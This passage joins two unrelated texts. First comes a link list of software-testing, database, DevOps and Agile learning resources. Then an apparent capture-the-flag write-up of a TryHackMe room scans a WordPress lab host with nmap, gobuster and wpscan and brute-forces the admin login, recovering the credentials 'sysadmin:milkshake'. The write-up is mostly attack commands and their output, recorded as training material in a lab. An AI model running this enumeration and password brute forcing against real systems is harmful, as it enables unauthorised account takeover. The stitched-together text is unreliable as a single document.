Open Source Security Testing Tools for Web Apps](https://hackr.io/blog/top-10-open-source-security-testing-tools-for-web-applications) - [10 best mobile app security testing tools](https://www.softwaretestinghelp.com/mobile-app-security-testing-tools/) - [API Security Tools](https://owasp.org/www-community/api_security_tools) - [Snyk.io](https://snyk.io/) - [Pynt.io](https://www.pynt.io/) - [Black Duck](https://community.synopsys.com/s/) - [Checkmarx](https://checkmarx.com/) </details> # Performance Testing <details> <summary>Performance Testing Tutorials</summary> - [A Complete Performance Testing Guide With Examples](https://www.softwaretestinghelp.com/introduction-to-performance-testing-loadrunner-training-tutorial-part-1/) - [What is Performance Testing?](https://www.techtarget.com/searchsoftwarequality/definition/performance-testing) - [Master Performance Testing](https://university.blazemeter.com/) - [Performance Testing vs. Load Testing vs. Stress Testing](https://www.blazemeter.com/blog/performance-testing-vs-load-testing-vs-stress-testing) - [What is Throughput in Performance Testing?](https://testguild.com/performance-testing-what-is-throughput/) - [Load Testing Best Practices](https://loadninja.com/load-testing/) - [Tools and Techniques for Performance and Load Testing](https://testautomationu.applitools.com/performance-and-load-testing/) - [awesome-performance-testing](https://github.com/andriisoldatenko/awesome-performance-testing) - [15 Top Load Testing Tools Open Source MUST KNOW in 2021](https://www.youtube.com/watch?v=KECr2BujqtM) - [15 BEST Performance Testing Tools (Load Testing Tools) In 2023](https://www.softwaretestinghelp.com/performance-testing-tools-load-testing-tools/) - [Performance Testing Tools: Types, Use & More](https://www.knowledgehut.com/blog/software-testing/performance-testing-tools) </details> <details> <summary>K6</summary> - [Beginner’s Guide to Load Testing with k6](https://medium.com/swlh/beginners-guide-to-load-testing-with-k6-85ec614d2f0d) - [API performance testing with k6](https://circleci.com/blog/api-performance-testing-with-k6/) - [K6 - Usage Guide and Docs](https://k6.io/docs/) - [K6 - Examples and Tutorials](https://k6.io/docs/examples/) - [K6 - API Load Testing](https://k6.io/docs/testing-guides/api-load-testing/) - [How to get started with K6?](https://isitobservable.io/site-reliability-engineering/how-to-get-started-with-k6) - [Grafana K6](https://github.com/grafana/k6) - [Performance Testing with K6](https://github.com/cajames/performance-testing-with-k6) </details> <details> <summary>Gatling</summary> - [Free Gatling Courses on Gatling Academy](https://academy.gatling.io/collections) - [awesome-gatling](https://github.com/aliesbelik/awesome-gatling) - [Gatling Tutorial: Getting Started With Gatling Load Testing](https://www.softwaretestinghelp.com/gatling-tutorial/) - [Gatling Quickstart](https://gatling.io/docs/gatling/tutorials/quickstart/) - [Load Testing with Gatling - James Willett](https://www.james-willett.com/gatling-load-testing-complete-guide/) - [Intro to Gatling](https://www.baeldung.com/introduction-to-gatling) - [8 Reasons You Should Use Gatling for Load Testing](https://www.blazemeter.com/blog/gatling-load-testing) </details> <details> <summary>JMeter</summary> - [Jeter Documentation](https://jmeter.apache.org/) - [JMeter -Github](https://github.com/apache/jmeter) - [JMeter Plugins](https://jmeter-plugins.org/) - [JMeter Maven Plugin](https://github.com/jmeter-maven-plugin/jmeter-maven-plugin) - [JMeter Tutorials: The Complete Free Training On JMeter](https://www.softwaretestinghelp.com/jmeter-tutorials/) - [JMeter Tutorial](https://www.blazemeter.com/blog/jmeter-tutorial) - [JMeter Tutorials - SWTestacademy](https://www.swtestacademy.com/category/performance-testing/jmeter/) - [JMeter Tutorial - Great Learning](https://www.mygreatlearning.com/jmeter/tutorials) - [Intro to JMeter - Baeldung](https://www.baeldung.com/jmeter) - [awesome-jmeter](https://github.com/aliesbelik/awesome-jmeter) </details> <details> <summary>Google Lighthouse</summary> - [Lighthouse - GitHub](https://github.com/GoogleChrome/lighthouse) - [What Is Google Lighthouse and How to Use It?](https://www.elegantthemes.com/blog/wordpress/what-is-google-lighthouse-and-how-to-use-it) - [Introduction to Chrome Lighthouse](https://www.freecodecamp.org/news/introduction-to-chrome-lighthouse/) </details> <details> <summary>YouTube Channels</summary> - [Actionable Performance Testing & SRE Tips on the TestGuild Performance Podcast](https://www.youtube.com/playlist?list=PL9AgRtJkydU3pQfcrQmDrGMbx3aNMnLnW) - [Gatling Tutorials for Beginners - James Willett](https://www.youtube.com/playlist?list=PLw_jGKXm9lIYpTotIJ-R31pXS7qqwXstt) - [K6](https://www.youtube.com/@k6io) - [JMeter Tutorials](https://www.youtube.com/playlist?list=PLCYqwbyDA33R5p7f0oBcQ7DdYOG16x5KL) - [Gatling Corp](https://www.youtube.com/channel/UCaNih6sKuJ9DIMjTEW1EAlQ) - [How To Test Software Performance](https://www.youtube.com/watch?v=7koEc8iX7AM) - [What Is Google Lighthouse and How to Use It?](https://www.youtube.com/watch?v=VyaHwvPWuZU) </details> # AR/VR/XR Testing <details> <summary>Learning Materials</summary> - [What is MetaVerse? | VR, AR, MR and XR](https://medium.com/@iamfaisalkhatri/what-is-metaverse-vr-ar-mr-and-xr-4b77b6f6391a) - [AR/VR Testing Tutorial – How To Perform AR/VR Testing](https://www.softwaretestingmaterial.com/ar-vr-testing/) - [All You Need To Know About Augmented Reality Testing](https://mobidev.biz/blog/how-test-augmented-reality-applications) - [Arium — An Automation framework for Unity/XR](https://medium.com/xrpractices/arium-an-automation-framework-for-unity-xr-d51ed608e8b0) - [How to Test Voice Recognition in 4 Steps With Perfecto](https://www.perfecto.io/blog/test-voice-recognition-perfecto) - [Audio Capture From iOS Simulators and Real Devices](https://appium.io/docs/en/writing-running-appium/ios/audio-capture/) - [How To Do Virtual Augmented Reality Testing](https://testguild.com/testing-virtual-augmented-reality/) - [Visual Testing of AR, VR, and MR in Research Focused Product Delivery](https://applitools.com/blog/visual-testing-of-virtual-reality/) </details> <details> <summary>Automation Tools/Frameworks </summary> - [Arium Framework](https://github.com/thoughtworks/Arium) </details> # IVR Testing <details> <summary>Learning Materials</summary> - [What Is IVR System And How To Perform IVR Testing](https://www.softwaretestinghelp.com/ivr-testing/) - [IVR Testing: The Complete Checklist](https://www.inform-comms.com/ivr-testing-complete-checklist/) - [Interactive Voice Response (IVR) explained](https://www.ir.com/blog/communications/ivr-testing-explained) - [Challenges to In-House IVR Testing](https://www.spearline.com/blog/challenges-to-in-house-ivr-testing/) - [Top 7 Open-Source IVR Automation Testing Tools for Businesses](https://www.hitechnectar.com/blogs/top-7-open-source-ivr-automation-testing-tools-for-businesses/) </details> # Database Tutorials <details> <summary>Learning Materials</summary> - [What is a Database?](https://www.oracle.com/in/database/what-is-database/) - [Different Types of Databases - JavatPoint](https://www.javatpoint.com/types-of-databases) - [Database types - Mongodb.com](https://www.mongodb.com/databases/types) - [Types of Databases - Tutorialspoint](https://www.tutorialspoint.com/Types-of-databases) - [DBMC and SQL basics](https://www.freecodecamp.org/news/dbms-and-sql-basics/) - [Database Management System](https://www.w3schools.in/dbms) </details> <details> <summary>SQL/MySQL Tutorials</summary> - [SQL Tutorial - SQLTutorial.org](https://www.sqltutorial.org/) - [SQL Tutorial - W3Schools](https://www.w3schools.com/sql/) - [SQL Tutorial - SQLZoo.net](https://sqlzoo.net/wiki/SQL_Tutorial) - [SQL Tutorial - Tutorialspoint](https://www.tutorialspoint.com/sql/index.htm) - [SQL Tutorial - Javatpoint](https://www.javatpoint.com/sql-tutorial) - [SQL Tutorial - Programiz](https://www.programiz.com/sql) - [SQL Tutorial - Full Database Course for Beginners](https://youtu.be/HXV3zeQKqGY) - [SQL Cheat Sheet](https://www.sqltutorial.org/sql-cheat-sheet/) - [Visualize your SQL queries](https://sqlflow.gudusoft.com/#/) - [MySQL tutorial](https://www.mysqltutorial.org/) - [MySQL Tutorial - W3Schools](https://www.w3schools.com/MySQL/default.asp) - [MySQL Tutorial - Tutorialspoint](https://www.tutorialspoint.com/mysql/index.htm) - [Learn to use MySQL Database - FreeCodeCamp.org](https://www.freecodecamp.org/news/learn-to-use-the-mysql-database/) - [MySQL Workbench](https://www.javatpoint.com/mysql-workbench) </details> <details> <summary>NoSQL Tutorials</summary> - [What are NoSQL Databases?](https://www.javatpoint.com/nosql-databases) - [NoSQL Tutorial](https://www.janbasktraining.com/blog/nosql-tutorial/) - [Learn NoSQL in 3 hours - FreecodeCamp](https://www.freecodecamp.org/news/learn-nosql-in-3-hours/) </details> <details> <summary>MongoDB Tutorials</summary> - [MongoDB Tutorial - MongoDB.com](https://www.mongodb.com/docs/manual/tutorial/) - [MongoDB Tutorial - MongoDBtutorial.org](https://www.mongodbtutorial.org/) - [MongoDB Tutorial - W3resource.com](https://www.w3resource.com/mongodb/nosql.php) - [MongoDB Tutorial - MongoDB.com](https://www.mongodb.com/nosql-explained) - [MongoDB Tutorial - W3Schools.com](https://www.w3schools.com/mongodb/) - [MongoDB Tutorial - Tutorialspoint](https://www.tutorialspoint.com/mongodb/index.htm) </details> <details> <summary>DynamoDB Tutorials</summary> - [DynamoDB - AWS - Getting Started](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/GettingStartedDynamoDB.html) - [DynamoDB Tutorial - Dynobase.dev](https://dynobase.dev/dynamodb-tutorials/) - [DynamoDB Tutorial - Tutorialspoint](https://www.tutorialspoint.com/dynamodb/index.htm) - [DynamoDB Tutorial - Javatpoint](https://www.javatpoint.com/aws-dynamodb) - [DynamoDB Tutorial - Tutorialsdojo](https://tutorialsdojo.com/amazon-dynamodb/) - [DynamoDB Tutorial - DigitalCloud](https://digitalcloud.training/amazon-dynamodb-tutorial-for-beginners/) </details> <details> <summary>Postgres Tutorials</summary> - [Postgres Tutorial - Postgresql.org](https://www.postgresql.org/docs/online-resources/) - [Postgres Tutorial - Postgresqltutorial.com](https://www.postgresqltutorial.com/) - [Postgres Tutorial - Tutorialspoint](https://www.tutorialspoint.com/postgresql/index.htm) - [Postgres Tutorial - Postgresql.com](https://www.postgresql.org/docs/current/tutorial.html) - [Postgres Tutorial - Javatpoint](https://www.javatpoint.com/postgresql-tutorial) - [Postgres Tutorial - TutorialsTeacher](https://www.tutorialsteacher.com/postgresql) </details> <details> <summary>Database Testing </summary> - [Database Testing Complete Guide](https://www.softwaretestinghelp.com/database-testing-process/) - [Database Testing Tutorial - Softwaretestingmaterial.com](https://www.softwaretestingmaterial.com/database-testing/) - [Database Testing Tutorial - Tutorialspoint](https://www.tutorialspoint.com/database_testing/index.htm) - [Database Testing - Javatpoint](https://www.javatpoint.com/database-testing) - [Introduction to Database Testing](https://circleci.com/blog/intro-db-testing/) </details> # DevOps <details> <summary>Learning Materials</summary> - [Free Devops Books](https://github.com/nkatre/Free-DevOps-Books-1) - [Lets-DevOps/awesome-learning](https://github.com/Lets-DevOps/awesome-learning) - [What is CI/CD?](https://www.redhat.com/en/topics/devops/what-is-ci-cd#ci/cd-tools) - [What is CI/CD Pipeline?](https://www.redhat.com/en/topics/devops/what-cicd-pipeline) - [annfelix/DEVOPS-WORLD](https://github.com/annfelix/DEVOPS-WORLD) - [Continuous Integration Patterns and Anti-Patterns](https://dzone.com/refcardz/continuous-integration) - [Learn How to Set Up a CI/CD Pipeline From Scratch](https://dzone.com/articles/learn-how-to-setup-a-cicd-pipeline-from-scratch) - [How to use Docker for Automation Testing?](https://www.engati.com/blog/docker-for-automation-testing) - [Test Automation in DevOps](https://testautomationu.applitools.com/test-automation-in-devops/) - [Continuous Testing with Azure DevOps](https://testautomationu.applitools.com/azure-devops-tutorial/) - [Scaling tests with Docker](https://testautomationu.applitools.com/scaling-tests-with-docker/) - [Whole Team Approach to Continuous Testing](https://testautomationu.applitools.com/the-whole-team-approach-to-continuous-testing/) </details> <details> <summary>Blogs</summary> - [DevOps.com](https://devops.com/category/blogs/ai/) - [ContinuousDelivery.com](https://continuousdelivery.com/) - [Continuous Deliver in DevOps](https://www.softwaretestinghelp.com/continuous-delivery-in-devops/) - [Devops Testing](https://medium.com/@iamfaisalkhatri/devops-testing-vtest-blog-635d88de352f) - [Practical Guide to Continuous Intergration for Automation Testing](https://medium.com/@iamfaisalkhatri/practical-guide-on-continuous-integration-for-automation-tests-vtest-blog-23e6d37f523f) - [Jez Humble's Blog](https://continuousdelivery.com/) - [Dave Farley's Blog](https://www.davefarley.net/) - [Gasper Vitta's Blog(Lots of cool stuff on CI/CD, docker, testing)](https://www.gasparevitta.com/) - [What is Continuous Testing?](https://medium.com/@iamfaisalkhatri/what-is-continuous-testing-lambdatest-bd2c464b414c) - [Spacelift.io](https://spacelift.io/blog) </details> <details> <summary>YouTube Channels</summary> - [Dave Farley - Continuous Delivery](https://www.youtube.com/@ContinuousDelivery) - [DevOps Engineering Course for Beginners](https://www.youtube.com/watch?v=j5Zsa_eOXeY) - [What is DevOps?](https://www.youtube.com/watch?v=kBV8gPVZNEE) - [DevOps Prerequisites Course - Getting started with DevOps](https://www.youtube.com/watch?v=Wvf0mBNGjXY) </details> <details> <summary>Jenkins </summary> - [Jenkins Tutorials](https://www.jenkins.io/doc/tutorials/) - [Jekins Beginners Tutorials](https://www.softwaretestinghelp.com/jenkins-tutorials/) - [Jenkins CI Tutorials](https://www.softwaretestinghelp.com/jenkins-ci-tutorial/) - [Testing with Jenkins](https://www.jenkins.io/doc/developer/testing/) - [Jenkins Tutorial](https://testautomationu.applitools.com/jenkins-tutorial/) - [Jenkins YouTube Channel](https://www.youtube.com/@jenkinscicd) - [Selenium Continuous Integration with Jenkins](https://www.softwaretestingmaterial.com/selenium-continuous-integration/) - [What is Jenkins and How does it work?](https://www.techtarget.com/searchsoftwarequality/definition/Jenkins) - [What is Jenkins? How to Use Jenkins for CI/CD and Testing](https://applitools.com/blog/what-is-jenkins-how-to-use-jenkins-ci-testing/) - [Jenkins Tutorial for Beginners: A Comprehensive Guide With Examples and Best Practices](https://www.lambdatest.com/learning-hub/jenkins) - [Jenkins Full Course in 4 Hours | Jenkins Tutorial For Beginners](https://www.youtube.com/watch?v=3a8KsB5wJDE) - [ssbostan/jenkins-tutorial](https://github.com/ssbostan/jenkins-tutorial) </details> <details> <summary>Docker</summary> - [Docker](https://www.youtube.com/@DockerIo) - [Play with Docker](https://www.docker.com/play-with-docker/) - [Learn Docker Online](https://learndocker.online/) - [Docker Curriculum](https://docker-curriculum.com/#) - [Learning Docker](https://github.com/willitscale/learning-docker) - [veggiemonk/awesome-docker](https://github.com/veggiemonk/awesome-docker) - [The Ultimate Guide to End to End Tests with Selenium and Docker](https://www.freecodecamp.org/news/end-to-end-tests-with-selenium-and-docker-the-ultimate-guide/) - [Docker full Course](https://dev.to/techworld_with_nana/full-docker-course-free-4hl3) - [Training - Play with Docker](https://training.play-with-docker.com/) - [Docker Tutorial for Beginners by Mosh](https://www.youtube.com/watch?v=pTFZFxd4hOI) - [Docker Labs](https://github.com/docker/labs) - [Docker Tutorial for Beginners | Docker Full Course](https://www.youtube.com/watch?v=zJ6WbK9zFpI) - [Docker Tutorial for Beginners - A Full DevOps Course on How to Run Applications in Containers](https://www.youtube.com/watch?v=fqMOX6JJhGo) - [Docker Containers and Kubernetes Fundamentals – Full Hands-On Course](https://www.youtube.com/watch?v=kTp5xUtcalw) - [Docker Tutorial for Beginners [FULL COURSE in 3 Hours]](https://www.youtube.com/watch?v=3c-iBn73dDE) - [Parallel Execution of Tests using Selenium Grid 4 with Docker Compose](https://medium.com/@iamfaisalkhatri/parallel-execution-of-tests-using-selenium-grid-4-with-docker-compose-2dc243f4fe8b) - [Introduction to Docker Compose](https://www.baeldung.com/ops/docker-compose) - [Docker Compose Documentation](https://docs.docker.com/get-started/08_using_compose/) - [docker/compose](https://github.com/docker/compose) - [Docker Tutorial for Beginners – Introduction & Getting Started](https://spacelift.io/blog/docker-tutorial) </details> <details> <summary>GitHub Actions</summary> - [GitHub Actions Documentation](https://docs.github.com/en/actions) - [GitHub Actions Guide](https://docs.github.com/en/actions/guides) - [Automate your workflow from idea to production](https://github.com/features/actions) - [How to setup GitHub Actions for NodeJS project?](https://medium.com/@iamfaisalkhatri/how-to-setup-github-actions-for-node-js-project-1edd6ce1dbe1) - [GitHub Actions Tutorial - Basic Concepts and CI/CD Pipeline with Docker](https://www.youtube.com/watch?v=R8_veQiYBjI) - [How to setup Github Actions for Java with Maven project?](https://medium.com/@iamfaisalkhatri/how-to-setup-github-actions-for-java-with-maven-project-b6fe394be508) - [GitHub Actions for testing - Test Automation University](https://testautomationu.applitools.com/github-actions-for-testing/) </details> # TDD <details> <summary>Learning Materials</summary> - [Awesome TDD](https://github.com/unicodeveloper/awesome-tdd) - [TestDrivenDevelopment - Martin Fowler](https://martinfowler.com/bliki/TestDrivenDevelopment.html) - [TDD Is The Best Design Technique - Dave Farley](https://www.youtube.com/watch?v=ln4WnxX-wrw) - [The 3 Types of Unit Test in TDD • Dave Farley • GOTO 2022](https://www.youtube.com/watch?v=ihOUzzwPFIk) - [Test Driven Development vs Behavior Driven Development • Dave Farley • GOTO 2022](https://www.youtube.com/watch?v=ILmSEyeM9IU) - [TDD | Dave Farley's Blog](https://www.davefarley.net/?cat=16) - [Test *Driven* Development - Dave Farley](https://www.davefarley.net/?p=220) - [Test Driven Development is the best thing that has happened to software design](https://www.thoughtworks.com/en-in/insights/blog/test-driven-development-best-thing-has-happened-software-design) - [TDD Quick Guide](https://brainhub.eu/library/test-driven-development-tdd) </details> # BDD <details> <summary>Learning Materials</summary> - [What is BDD?](https://cucumber.io/docs/bdd/) - [BDD - A Complete Tutorial](https://www.softwaretestinghelp.com/bdd-framework/) - [Beginners guide to BDD](https://inviqa.com/blog/bdd-guide) - [Cucumber Installation](https://cucumber.io/docs/installation/) - [Cucumber Guides](https://cucumber.io/docs/guides/) - [Cucumber Documentation](https://cucumber.io/docs/cucumber/) - [Cucumber blogs](https://cucumber.io/blog/) - [Gherkin syntax](https://cucumber.io/docs/cucumber/) - [Cucumber with Java](https://testautomationu.applitools.com/cucumber-java-tutorial/) - [Cucumber with JavaScript](https://testautomationu.applitools.com/cucumber-javascript-tutorial/) - [BDD with Pytest](https://testautomationu.applitools.com/behavior-driven-python-with-pytest-bdd/) - [Cypress Cucumber - Step by Step Guide](https://filiphric.com/cucumber-in-cypress-a-step-by-step-guide) - [Cucumber.js for BDD: An Introductory Tutorial With Examples](https://www.testim.io/blog/cucumber-js-for-bdd-an-introductory-tutorial-with-examples/) - [Cucumber Testing](https://www.javatpoint.com/cucumber-testing) - [Cucumber Tutorial](https://www.tutorialspoint.com/cucumber/index.htm) - [Behaviour Driven Development: Tips for writing better feature files](https://www.bbc.co.uk/blogs/internet/entries/ff14236d-098a-3565-b678-ff4ba5776a5f) - [Serenity Dojo TV](https://www.youtube.com/@JohnFergusonSmart) - [Serenity Core](https://github.com/serenity-bdd/serenity-core) - [The Cucumber for Java Book](https://hoclaptrinhdanang.com/downloads/pdf/testing/the-cucumber-for-java-book.pdf) - [Cucumber books](https://cucumber.io/docs/professional/books/) - [BDD Community](https://cucumber.io/docs/bdd/) - [IntelliJ Cucumber Support](https://www.jetbrains.com/help/idea/cucumber-support.html) </details> # Agile <details> <summary>Learning Materials </summary> - [Awesome Agile](https://github.com/lorabv/awesome-agile) - [What is Agile?](https://www.coursera.org/articles/what-is-agile-a-beginners-guide) - [Agile in a nutshell](http://www.agilenutshell.com/) - [Agile Software blogs by Mike Cohn](https://www.mountaingoatsoftware.com/blog) - [Agile Software Guide - Martin Fowler](https://martinfowler.com/agile.html) - [What is Scrum?](https://www.scrum.org/resources/what-is-scrum) - [Agile 101](https://www.agilealliance.org/agile101/) - [Agile Manifesto](https://agilemanifesto.org/) - [Agile Methodology Tutorial for Beginners](https://www.youtube.com/watch?v=KNBHQ0pyaG8) - [Planning Poker](https://planningpoker.live/) - [Agile Retrospectives](https://www.easyagile.com/blog/retrospectives/) - [Agile Retrospective Meetings](https://www.softwaretestinghelp.com/agile-retrospective-meetings/) - [Agile Sprint planning](https://www.easyagile.com/blog/agile-sprint-planning/) - [7 Lessons Agile Can Teach Us about Leadership](https://www.agileconnection.com/article/7-lessons-agile-can-teach-us-about-leadership) - [DZone Agile blogs](https://dzone.com/agile) - [Agile Testing - LambdaTest Learning Hub](https://www.lambdatest.com/learning-hub/agile-testing) - [Agilemania's blogs](https://agilemania.com/blog/) </details> <!-- <details> <summary> </summary> </details> -->
# For Business Reasons In your network scan, you found an unknown VM.... [For Business Reasons](https://tryhackme.com/room/forbusinessreasons) ## Topic's - Network Enumeration - Web Enumeration - Enumeration (Wordpress) - Brute Forcing (Wordpress) - Exploitation (Wordpress) - Security Misconfiguration - Stored Passwords & Keys - Network Tunneling - Exploitation (LXC) ## Appendix archive Password: `1 kn0w 1 5h0uldn'7!` ## Task 1 For Business Reasons You find a Host run by MilkCo\*, run by a competent but not perfect team of sysadmins... But teams make mistakes. Immature teams often do things like have all the elements of security like strict firewalls but then throw it all away by not understanding a technology or using shared passwords. This is a hyper-realistic room. This room also features a difficult pivot. \*_MilkCo is totally made up._ ``` kali@kali:~/CTFs/tryhackme/For Business Reasons$ sudo nmap -A -sC -sV -sS -O 10.10.133.94 [sudo] password for kali: Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-15 21:41 CEST Nmap scan report for 10.10.133.94 Host is up (0.033s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-generator: WordPress 5.4.2 | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-server-header: Apache/2.4.38 (Debian) |_http-title: MilkCo Test/POC site &#8211; Just another WordPress site Aggressive OS guesses: HP P2000 G3 NAS device (91%), OpenWrt 12.09-rc1 Attitude Adjustment (Linux 3.3 - 3.7) (90%), Linux 3.16 - 4.6 (90%), Linux 3.2 (90%), Linux 2.6.26 - 2.6.35 (89%), Linux 2.6.32 - 3.13 (89%), Linux 2.6.32 - 3.4.1 (89%), Linux 3.0 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 32.53 ms 10.8.0.1 2 32.62 ms 10.10.133.94 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.34 seconds ``` ``` kali@kali:~/CTFs/tryhackme/For Business Reasons$ gobuster dir -u 10.10.133.94 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.133.94 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/10/15 21:42:32 Starting gobuster =============================================================== /images (Status: 200) /rss (Status: 301) /0 (Status: 301) /feed (Status: 301) /atom (Status: 301) /wp-content (Status: 301) /rss2 (Status: 301) /wp-includes (Status: 301) /mysql (Status: 301) /rdf (Status: 301) /page1 (Status: 301) /' (Status: 301) /%20 (Status: 301) Progress: 4034 / 220561 (1.83%)^C [!] Keyboard interrupt detected, terminating. =============================================================== 2020/10/15 21:45:33 Finished =============================================================== ``` [http://10.10.133.94/robots.txt](http://10.10.133.94/robots.txt) ``` User-agent: * Disallow: /wp-admin/ Allow: /wp-admin/admin-ajax.php ``` ``` kali@kali:~/CTFs/tryhackme/For Business Reasons$ wpscan --url 10.10.133.94 --enumerate vp,vt,u,dbe _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://10.10.133.94/ [10.10.133.94] [+] Started: Thu Oct 15 21:45:37 2020 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.38 (Debian) | - X-Powered-By: PHP/7.2.33 | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://10.10.133.94/robots.txt | Interesting Entries: | - /wp-admin/ | - /wp-admin/admin-ajax.php | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://10.10.133.94/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://10.10.133.94/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://10.10.133.94/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10). | Found By: Emoji Settings (Passive Detection) | - http://10.10.133.94/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2' | Confirmed By: Meta Generator (Passive Detection) | - http://10.10.133.94/, Match: 'WordPress 5.4.2' [i] The main theme could not be detected. [+] Enumerating Vulnerable Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:06 <===============> (329 / 329) 100.00% Time: 00:00:06 [i] No themes Found. [+] Enumerating DB Exports (via Passive and Aggressive Methods) Checking DB Exports - Time: 00:00:00 <======================> (36 / 36) 100.00% Time: 00:00:00 [i] No DB Exports Found. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:01 <===================================================================================================================> (10 / 10) 100.00% Time: 00:00:01 [i] User(s) Identified: [+] sysadmin | Found By: Wp Json Api (Aggressive Detection) | - http://10.10.133.94/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Rss Generator (Aggressive Detection) | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Thu Oct 15 21:48:59 2020 [+] Requests Done: 417 [+] Cached Requests: 5 [+] Data Sent: 93.299 KB [+] Data Received: 328.199 KB [+] Memory used: 189.023 MB [+] Elapsed time: 00:03:22 ``` ``` kali@kali:~/CTFs/tryhackme/For Business Reasons$ wpscan --url 10.10.133.94 --passwords /usr/share/wordlists/rockyou.txt --usernames sysadmin _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://10.10.133.94/ [10.10.133.94] [+] Started: Thu Oct 15 21:50:30 2020 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.38 (Debian) | - X-Powered-By: PHP/7.2.33 | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://10.10.133.94/robots.txt | Interesting Entries: | - /wp-admin/ | - /wp-admin/admin-ajax.php | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://10.10.133.94/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://10.10.133.94/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://10.10.133.94/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10). | Found By: Emoji Settings (Passive Detection) | - http://10.10.133.94/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2' | Confirmed By: Meta Generator (Passive Detection) | - http://10.10.133.94/, Match: 'WordPress 5.4.2' [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <====================================================================================================================> (21 / 21) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Performing password attack on Xmlrpc against 1 user/s Trying sysadmin / milkshake Time: 00:00:53 <===============================================================================================================> (1665 / 1665) 100.00% Time: 00:00:53 [SUCCESS] - sysadmin / milkshake [!] Valid Combinations Found: | Username: sysadmin, Password: milkshake [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Thu Oct 15 21:52:09 2020 [+] Requests Done: 1690 [+] Cached Requests: 27 [+] Data Sent: 828.526 KB [+] Data Received: 1.053 MB [+] Memory used: 1.015 GB [+] Elapsed time: 00:01:38 ``` `sysadmin:milkshake` 